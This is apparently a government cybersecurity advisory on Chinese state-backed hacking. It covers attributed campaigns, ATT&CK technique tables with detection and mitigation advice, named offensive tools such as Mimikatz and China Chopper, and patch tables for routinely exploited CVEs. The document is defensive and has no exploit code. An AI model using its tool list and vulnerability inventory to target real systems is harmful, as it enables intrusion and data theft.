China continues to engage in espionage-related activities that include theft of sensitive information such as innovation capital, IP, and personally identifiable information (PII). China has demonstrated a willingness to push the boundaries of their activities to secure information critical to advancing their economic prowess and competitive advantage.\n\n#### Chinese Cyber Activity\n\nAccording to open-source reporting, offensive cyber operations attributed to the Chinese government targeted, and continue to target, a variety of industries and organizations in the United States, including healthcare, financial services, defense industrial base, energy, government facilities, chemical, critical manufacturing (including automotive and aerospace), communications, IT, international trade, education, videogaming, faith-based organizations, and law firms.\n\nAdditionally, numerous Department of Justice (DOJ) indictments over several years provide evidence to suggest Chinese threat actors continuously seek to illegally obtain and exfiltrate U.S. IP. Their targets also include western companies with operations inside China.\n\nPublic reporting that associates Chinese actors with a range of high-profile attacks and offensive cyber activity includes:\n\n * **February 2013 \u2013 Cyber Threat Intelligence Researchers Link Advanced Persistent Threat (APT) 1 to China:** a comprehensive report publicly exposed APT1 as part of China\u2019s military cyber operations and a multi-year effort that exfiltrated IP from roughly 141 companies spanning 20 major industries.[[4](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>)] APT1 established access to the victims\u2019 networks and methodically exfiltrated IP across a large range of industries identified in China\u2019s 12th 5-Year Plan. 
A year later, the DOJ indicted Chinese cyber threat actors assigned to PLA Unit 61398 for the first time (also highlighted in the report).[[5](<https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor>)]\n * **April 2017 \u2013 Chinese APTs Targeting IP in 12 Countries:** CISA announced Chinese state-backed APTs carried out a multi-year campaign of cyber-enabled IP theft that targeted global technology service providers and their customers. The threat actors leveraged stolen administrative credentials (local and domain) and placed sophisticated malware on critical systems in an effort to steal the IP and sensitive data of companies located in at least 12 countries.[[6](<https://us-cert.cisa.gov/ncas/alerts/TA17-117A>)]\n * **December 2018 \u2013 Chinese Cyber Threat Actors Indicted for Compromising Managed Service Providers (MSPs):** DOJ indicted two Chinese cyber threat actors believed to be associated with APT10, who targeted MSPs and their large customer base through phishing and spearphishing campaigns aimed at exfiltrating sensitive business data and, possibly, PII.[[7](<https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers>)] CISA also briefed stakeholders on Chinese APT groups who targeted MSPs and their customers to steal data and further operationalize commercial and economic espionage.[[8](<https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)]\n * **February 2020 \u2013 China\u2019s Military Indicted for 2017 Equifax Hack:** DOJ indicted members of China\u2019s PLA for stealing large amounts of PII and IP. The Chinese cyber threat actors exploited a vulnerability in the company\u2019s dispute resolution website to enter the network, conduct reconnaissance, upload malware, and steal credentials to extract the targeted data. 
The breach impacted roughly half of all American citizens and stole Equifax\u2019s trade secrets.[[9](<https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military>)]\n * **May 2020 \u2013 China Targets COVID-19 Research Organizations:** the Federal Bureau of Investigation (FBI) and CISA reported the targeting and compromise of U.S. organizations conducting COVID-19-related research by cyber actors affiliated with China.[[10](<https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations>)] Large-scale password spraying campaigns were a commonly observed tactic in illicitly obtaining IP related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.[[11](<https://us-cert.cisa.gov/ncas/alerts/AA20126A>)],[[12](<https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity%20>)]\n\n#### Common TTPs of Publicly Known Chinese Threat Actors\n\nThe section below provides common, publicly known, TTPs employed by Chinese threat actors, which map to the MITRE ATT&CK framework. Where possible, the tables include actions for detection and mitigation. This section is not exhaustive and does not detail all TTPs or detection and mitigation actions. \n\n#### PRE-ATT&CK TTPs\n\nChinese threat actors commonly use the techniques listed in table 1 to achieve reconnaissance (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/tactics/TA0015/>)]), staging (_Stage Capabilities_ [[TA0026](<https://attack.mitre.org/tactics/TA0026/>)]), and testing (_Test Capabilities_ [[TA0025](<https://attack.mitre.org/tactics/TA0025/>)]) before executing an attack. 
PRE-ATT&CK techniques can be difficult to detect and mitigate, however, defenders should be aware of the use of these techniques.\n\n_Table 1: Chinese threat actor PRE-ATT&CK techniques_\n\n**Technique** | **Description** \n---|--- \n_Acquire and/or Use 3rd Party Software Services_ [[T1330](<https://attack.mitre.org/techniques/T1330/>)] | Staging and launching attacks from software as a service solutions that cannot be easily tied back to the APT \n_Compromise 3rd Party Infrastructure to Support Delivery_ [[T1334](<https://attack.mitre.org/techniques/T1334/>)] | Compromising infrastructure owned by other parties to facilitate attacks (instead of directly purchasing infrastructure) \n_Domain Registration Hijacking_ [[T1326](<https://attack.mitre.org/techniques/T1326/>)] | Changing the registration of a domain name without the permission of its original registrant and then using the legitimate domain as a launch point for malicious purposes \n_Acquire Open-Source Intelligence (OSINT) Data Sets and Information_ [[T1247](<https://attack.mitre.org/techniques/T1247/>)] | Gathering data and information from publicly available sources, including public-facing websites of the target organization \n_Conduct Active Scanning _[[T1254](<https://attack.mitre.org/techniques/T1254/>)] | Gathering information on target systems by scanning the systems for vulnerabilities. 
Adversaries are likely using tools such as Shodan to identify vulnerable devices connected to the internet \n_Analyze Architecture and Configuration Posture _[[T1288](<https://attack.mitre.org/techniques/T1288/>)] | Analyzing technical scan results to identify architectural flaws, misconfigurations, or improper security controls in victim networks \n_Upload, Install, and Configure Software/Tools_ [[T1362](<https://attack.mitre.org/techniques/T1362>)] | Placing malware on systems illegitimately for use during later stages of an attack to facilitate exploitability and gain remote access \n \n#### Enterprise ATT&CK TTPs\n\nChinese threat actors often employ publicly known TTPs against enterprise networks. To orchestrate attacks, they use commonly implemented security testing tools and frameworks, such as:\n\n * Cobalt Strike and Beacon\n * Mimikatz\n * PoisonIvy\n * PowerShell Empire\n * China Chopper Web Shell\n\nTable 2 lists common, publicly known, TTPs used by Chinese threat actors against enterprise networks and provides options for detection and mitigation based on the MITRE ATT&CK framework.\n\n_Table 2: Common Chinese threat actor techniques, detection, and mitigation_\n\n**Technique / Sub-Technique** | **Detection** | **Mitigation** \n---|---|--- \n_Obfuscated Files or Information _[[T1027](<https://attack.mitre.org/techniques/T1027/>)] | \n\n * Detect obfuscation by analyzing signatures of modified files.\n * Flag common syntax used in obfuscation.\n| \n\n * Use antivirus/antimalware software to analyze commands after processing. 
\n_Phishing: Spearphishing Attachment _[[T1566.001](<https://attack.mitre.org/techniques/T1566/001/>)] and _Spearphishing Link _[[T1566.002](<https://attack.mitre.org/techniques/T1566/002/>)] | \n\n * Use network intrusion detection systems (NIDS) and email gateways to detect suspicious attachments in email entering the network.\n * Use detonation chambers to inspect email attachments in isolated environments.\n| \n\n * Quarantine suspicious files with antivirus solutions.\n * Use network intrusion prevention systems to scan and remove malicious email attachments.\n * Train users to identify phishing emails and notify IT. \n_System Network Configuration Discovery_ [[T1016](<https://attack.mitre.org/techniques/T1016/>)] | \n\n * Monitor for processes and command-line arguments that could be used by an adversary to gather system and network information.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Command and Scripting Interpreter: Windows Command Shell _[[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)] | \n\n * Identify normal scripting behavior on the system then monitor processes and command-line arguments for suspicious script execution behavior.\n| \n\n * Only permit execution of signed scripts.\n * Disable any unused shells or interpreters. \n \n_User Execution: Malicious File _[[T1204.002](<https://attack.mitre.org/techniques/T1204/002/>)] | \n\n * Monitor execution of command-line arguments for applications (including compression applications) that may be used by an adversary to execute a user interaction.\n * Set antivirus software to detect malicious documents and files downloaded and installed on endpoints.\n| \n\n * Use execution prevention to prevent the running of executables disguised as other files.\n * Train users to identify phishing attacks and other malicious events that may require user interaction. 
\n_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder _[[T1547.001](<https://attack.mitre.org/techniques/T1547/001/>)] | \n\n * Monitor the start folder for additions and changes.\n * Monitor the registry for changes to run keys that do not correlate to known patches or software updates.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Command and Scripting Interpreter: PowerShell _[[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)] | \n\n * Enable PowerShell logging.\n * Monitor for changes in PowerShell execution policy as a method of identifying malicious use of PowerShell.\n * Monitor for PowerShell execution generally in environments where PowerShell is not typically used.\n| \n\n * Set PowerShell execution policy to execute only signed scripts.\n * Disable PowerShell if not needed by the system.\n * Disable WinRM service to help prevent use of PowerShell for remote execution.\n * Restrict PowerShell execution policy to administrators. \n_Hijack Execution Flow: DLL Side-Loading _[[T1574.002](<https://attack.mitre.org/techniques/T1574/002/>)] | \n\n * Track Dynamic Link Library (DLL) metadata, and compare DLLs that are loaded at process execution time against previous executions to detect unusual differences unrelated to patching.\n| \n\n * Use the program `sxstrace.exe` to check manifest files for side-loading vulnerabilities in software.\n * Update software regularly, including patches for DLL side-loading vulnerabilities. 
\n_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/techniques/T1105/>)] | \n\n * Monitor for unexpected file creation or files transfer into the network from external systems, which may be indicative of attackers staging tools in the compromised environment.\n * Analyze network traffic for unusual data flows (i.e., a client sending much more data than it receives from a server).\n| \n\n * Use network intrusion detection and prevention systems to identify traffic for specific adversary malware or unusual data transfer over protocols such as File Transfer Protocol. \n_Remote System Discovery_ [[T1018](<https://attack.mitre.org/techniques/T1018/>)] | \n\n * Monitor processes and command-line arguments for actions that could be taken to gather system and network information.\n * In cloud environments, usage of commands and application program interfaces (APIs) to request information about remote systems combined with additional unexpected commands may be a sign of malicious use.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Software Deployment Tools_ [[T1072](<https://attack.mitre.org/techniques/T1072/>)] | \n\n * Identify the typical use pattern of third-party deployment software, then monitor for irregular deployment activity.\n| \n\n * Isolate critical network systems access using group policies, multi-factor authentication (MFA), and firewalls.\n * Patch deployment systems regularly.\n * Use unique and limited credentials for access to deployment systems. \n_Brute Force: Password Spraying_ [[T1110.003](<https://attack.mitre.org/techniques/T1110/003/>)] | \n\n * Monitor logs for failed authentication attempts to valid accounts.\n| \n\n * Use MFA.\n * Set account lockout policies after a certain number of failed login attempts. 
\n_Network Service Scanning_ [[T1046](<https://attack.mitre.org/techniques/T1046/>)] | \n\n * Use NIDS to identify scanning activity.\n| \n\n * Close unnecessary ports and services.\n * Segment network to protect critical servers and devices. \n_Email Collection _[[T1114](<https://attack.mitre.org/techniques/T1114/>)] | \n\n * Monitor processes and command-line arguments for actions that could be taken to gather local email files.\n| \n\n * Encrypt sensitive emails.\n * Audit auto-forwarding email rules regularly.\n * Use MFA for public-facing webmail servers. \n_Proxy: External Proxy_ [[T1090.002](<https://attack.mitre.org/techniques/T1090/002/>)] | \n\n * Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server.\n| \n\n * Use NIDS and prevention systems to identify traffic for specific adversary malware using network signatures. \n_Drive-by Compromise _[[T1189](<https://attack.mitre.org/techniques/T1189/>)] | \n\n * Use Firewalls and proxies to inspect URLs for potentially known-bad domains or parameters.\n * Monitor network intrusion detection systems (IDS) to detect malicious scripts, and monitor endpoints for abnormal behavior.\n\n| \n\n * Isolate and sandbox impacted systems and applications to restrict the spread of malware.\n * Leverage security applications to identify malicious behavior during exploitation.\n * Restrict web-based content through ad-blockers and script blocking extensions. \n_Server Software Component: Web Shell_ [[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)] | \n\n * Analyze authentication logs, files, netflow/enclave netflow, and leverage process monitoring to discover anomalous activity.\n| \n\n * Patch vulnerabilities in internet facing applications.\n * Leverage file integrity monitoring to identify file changes.\n * Configure server to block access to the web accessible directory through principle of least privilege. 
\n_Application Layer Protocol: File Transfer Protocols _[[T1071.002](<https://attack.mitre.org/techniques/T1071/002/>)] and _DNS_ [[T1071.004](<https://attack.mitre.org/techniques/T1071/004/>)] | \n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.\n| \n\n * Leverage NIDS and NIPS using network signatures to identify traffic for specific adversary malware. \n \n#### Additional APT Activity\n\nThe TTPs listed above have been repeatedly used across the spectrum of Chinese threat actors. The mitigations referenced in this alert can help reduce vulnerability to these TTPs; however, defenders should also maintain heightened awareness of threats actors that are more innovative in their approach, making it difficult to detect and respond to compromise. Publicly reported examples[[13](<https://www.fireeye.com/current-threats/apt-groups.html>)] include:\n\n * **APT3 **(known as UPS Team) is known for deploying zero-day attacks that target Internet Explorer, Firefox, and Adobe Flash Player. The group\u2019s custom implants and changing Command and Control (C2) infrastructure make them difficult to track. 
APT3 exploits use Rivest Cypher 4 (RC4) encryption to communicate and bypass address space layout randomization (ASLR)/Data Execution Prevention (DEP) by using Return Oriented Programming (ROP) chains.[[14](<https://attack.mitre.org/groups/G0022/>)]\n * **APT10 **(known as MenuPass Group) has established accessed to victim networks through compromised service providers, making it difficult for network defenders to identify the malicious traffic.\n * **APT19** (known as Codoso and Deep Panda) is known for developing custom Rich Text Format (RTF) and macro-enabled Microsoft Office documents for both implants and payloads. The group has backdoored software, such as software serial generators, and has an elite use of PowerShell for C2 over Hyper Text Transfer Protocol (HTTP)/Hyper Text Transfer Protocol Secure (HTTPS).[[15](<https://attack.mitre.org/groups/G0073/>)]\n * **APT40** (known as Leviathan) has targeted external infrastructure with success, including internet-facing routers and virtual private networks.\n * **APT41 **(known as Double Dragon) has exploited vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central to compromise victims.[[16](<https://attack.mitre.org/groups/G0096/>)]\n\n### Mitigations\n\n### Recommended Actions\n\nThe following list provides actionable technical recommendations for IT security professionals to reduce their organization\u2019s overall vulnerability. These recommendations are not exhaustive; rather they focus on the actions that will greatly reduce stakeholders\u2019 attack surface.\n\n 1. **Patch systems and equipment promptly and diligently. **Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally-facing (i.e., internet) equipment. 
Certain vulnerabilities—including CVE-2012-0158 in Microsoft products [[17](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)], CVE-2019-19781 in Citrix devices [[18](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)], and CVE-2020-5902 in BIG-IP Traffic Management User Interface [[19](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>)]—have presented APTs with prime targets to gain initial access. Chinese APTs often use existing exploit code to target routinely exploited vulnerabilities [[20](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)], an opportunistic approach that requires limited resources. See table 3 for patch information on CVEs that have been routinely exploited by Chinese APTs. See table 4 for patch information on vulnerabilities that the National Security Agency (NSA) has stated are actively used by Chinese state-sponsored cyber actors.

_Table 3: Patch information for vulnerabilities routinely exploited by Chinese APT actors_

**Vulnerability** | **Vulnerable Products** | **Patch Information**
---|---|---
[CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) | Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 | [Microsoft Security Bulletin MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027>)
[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | BIG-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT) | [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)
[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | Citrix Application Delivery Controller<br>Citrix Gateway<br>Citrix SDWAN WANOP | [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)<br>[Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)<br>[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)<br>[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)
[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15<br>Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15 | [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)
[CVE-2019-16920](<https://nvd.nist.gov/vuln/detail/CVE-2019-16920>) | D-Link products DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825 | [D-Link Security Advisory: DAP-1533 Rv Ax, DGL-5500 Rv Ax, DHP-1565 Rv Ax, DIR-130 Rv Ax, DIR-330 Rv Ax, DIR-615 Rv Ix, (non-US) DIR-652 Rv Bx, DIR-655 Rv Cx, DIR-825 Rv Cx, DIR-835 Rv Ax, DIR-855L Rv Ax, (non-US) DIR-862 Rv Ax, DIR-866L Rv Ax :: CVE-2019-16920 :: Unauthenticated Remote Code Execution (RCE) Vulnerability](<https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10124>)
[CVE-2019-16278](<https://nvd.nist.gov/vuln/detail/CVE-2019-16278>) | Nostromo 1.9.6 and below | [Nostromo 1.9.6 Directory Traversal / Remote Command Execution](<https://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html>)<br>[Nostromo 1.9.6 Remote Code Execution](<https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html>)
[CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>) | Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers | [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>)
[CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) | Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers | [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)
[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) | Zoho ManageEngine Desktop Central before 10.0.474 | [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>)

_Table 4: Patch information for NSA listed vulnerabilities used by Chinese state-sponsored cyber actors [[21](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)]_

**Vulnerability** | **Vulnerable Products** | **Patch Information**
---|---|---
[CVE-2020-8193](<https://nvd.nist.gov/vuln/detail/CVE-2020-8193>) | Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18<br>Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 | [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>)
[CVE-2020-8195](<https://nvd.nist.gov/vuln/detail/CVE-2020-8195>) | Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18<br>Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 | [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>)
[CVE-2020-8196](<https://nvd.nist.gov/vuln/detail/CVE-2020-8196>) | Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18<br>Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 | [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>)
[CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708>) | Windows 7 for 32-bit Systems Service Pack 1<br>Windows 7 for x64-based Systems Service Pack 1<br>Windows Server 2008 for 32-bit Systems Service Pack 2<br>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)<br>Windows Server 2008 for Itanium-Based Systems Service Pack 2<br>Windows Server 2008 for x64-based Systems Service Pack 2<br>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)<br>Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1<br>Windows Server 2008 R2 for x64-based Systems Service Pack 1<br>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) | [Microsoft Security Advisory for CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)
[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0<br>Sentry versions 9.7.2 and earlier, and 9.8.0<br>Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier | [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)
[CVE-2020-1350](<https://nvd.nist.gov/vuln/detail/CVE-2020-1350>) | Windows Server 2008 for 32-bit Systems Service Pack 2<br>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)<br>Windows Server 2008 for x64-based Systems Service Pack 2<br>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)<br>Windows Server 2008 R2 for x64-based Systems Service Pack 1<br>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)<br>Windows Server 2012<br>Windows Server 2012 (Server Core installation)<br>Windows Server 2012 R2<br>Windows Server 2012 R2 (Server Core installation)<br>Windows Server 2016<br>Windows Server 2016 (Server Core installation)<br>Windows Server 2019<br>Windows Server 2019 (Server Core installation)<br>Windows Server, version 1903 (Server Core installation)<br>Windows Server, version 1909 (Server Core installation)<br>Windows Server, version 2004 (Server Core installation) | [Microsoft Security Advisory for CVE-2020-1350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350>)
[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | Windows Server 2008 R2 for x64-based Systems Service Pack 1<br>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)<br>Windows Server 2012<br>Windows Server 2012 (Server Core installation)<br>Windows Server 2012 R2<br>Windows Server 2016<br>Windows Server 2019<br>Windows Server 2019 (Server Core installation)<br>Windows Server, version 1903 (Server Core installation)<br>Windows Server, version 1909 (Server Core installation)<br>Windows Server, version 2004 (Server Core installation) | [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)
[CVE-2020-1040](<https://nvd.nist.gov/vuln/detail/CVE-2020-1040>) | Windows Server 2008 R2 for x64-based Systems Service Pack 1<br>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)<br>Windows Server 2012<br>Windows Server 2012 (Server Core installation)<br>Windows Server 2012 R2<br>Windows Server 2012 R2 (Server Core installation)<br>Windows Server 2016<br>Windows Server 2016 (Server Core installation) | [Microsoft Security Advisory for CVE-2020-1040](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1040>)
[CVE-2018-6789](<https://nvd.nist.gov/vuln/detail/CVE-2018-6789>) | Exim before 4.90.1 | [Exim page for CVE-2018-6789](<https://exim.org/static/doc/security/CVE-2018-6789.txt>)<br>[Exim patch information for CVE-2018-6789](<https://git.exim.org/exim.git/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1>)
[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30<br>Microsoft Exchange Server 2013 Cumulative Update 23<br>Microsoft Exchange Server 2016 Cumulative Update 14<br>Microsoft Exchange Server 2016 Cumulative Update 15<br>Microsoft Exchange Server 2019 Cumulative Update 3<br>Microsoft Exchange Server 2019 Cumulative Update 4 | [Microsoft Security Advisory for CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)
[CVE-2018-4939](<https://nvd.nist.gov/vuln/detail/CVE-2018-4939>) | ColdFusion Update 5 and earlier versions<br>ColdFusion 11 Update 13 and earlier versions | [Adobe Security Bulletin APSB18-14](<https://helpx.adobe.com/security/products/coldfusion/apsb18-14.html>)
[CVE-2015-4852](<https://nvd.nist.gov/vuln/detail/CVE-2015-4852>) | Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 | [Oracle Critical Patch Update Advisory - October 2016](<https://www.oracle.com/security-alerts/cpuoct2016.html>)
[CVE-2020-2555](<https://nvd.nist.gov/vuln/detail/CVE-2020-2555>) | Oracle Coherence product of Oracle Fusion Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0 | [Oracle Critical Patch Update Advisory - January 2020](<https://www.oracle.com/security-alerts/cpujan2020.html>)
[CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) | Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3, and from version 6.14.0 before 6.14.2 | [Jira Atlassian Confluence Server and Data Center: Remote code execution via Widget Connector macro - CVE-2019-3396](<https://jira.atlassian.com/browse/CONFSERVER-57974>)
[CVE-2019-11580](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) | Atlassian Crowd and Crowd Data Center from version 2.1.0 before 3.0.5, from version 3.1.0 before 3.1.6, from version 3.2.0 before 3.2.8, from version 3.3.0 before 3.3.5, and from version 3.4.0 before 3.4.4 | [Jira Atlassian Crowd: Crowd - pdkinstall development plugin incorrectly enabled - CVE-2019-11580](<https://jira.atlassian.com/browse/CWD-5388>)
[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) | Zoho ManageEngine Desktop Central before 10.0.474 | [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>)
[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) | Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 | [Telerik: ASP.NET AJAX: Allows JavaScriptSerializer Deserialization](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>)
[CVE-2020-0601](<https://nvd.nist.gov/vuln/detail/CVE-2020-0601>) | Windows 10 for 32-bit Systems<br>Windows 10 for x64-based Systems<br>Windows 10 Version 1607 for 32-bit Systems<br>Windows 10 Version 1607 for x64-based Systems<br>Windows 10 Version 1709 for 32-bit Systems<br>Windows 10 Version 1709 for ARM64-based Systems<br>Windows 10 Version 1709 for x64-based Systems<br>Windows 10 Version 1803 for 32-bit Systems<br>Windows 10 Version 1803 for ARM64-based Systems<br>Windows 10 Version 1803 for x64-based Systems<br>Windows 10 Version 1809 for 32-bit Systems<br>Windows 10 Version 1809 for ARM64-based Systems<br>Windows 10 Version 1809 for x64-based Systems<br>Windows 10 Version 1903 for 32-bit Systems<br>Windows 10 Version 1903 for ARM64-based Systems<br>Windows 10 Version 1903 for x64-based Systems<br>Windows 10 Version 1909 for 32-bit Systems<br>Windows 10 Version 1909 for ARM64-based Systems<br>Windows 10 Version 1909 for x64-based Systems<br>Windows Server 2016<br>Windows Server 2016 (Server Core installation)<br>Windows Server 2019<br>Windows Server 2019 (Server Core installation)<br>Windows Server, version 1803 (Server Core Installation)<br>Windows Server, version 1903 (Server Core installation)<br>Windows Server, version 1909 (Server Core installation) | [Microsoft Security Advisory for CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>)
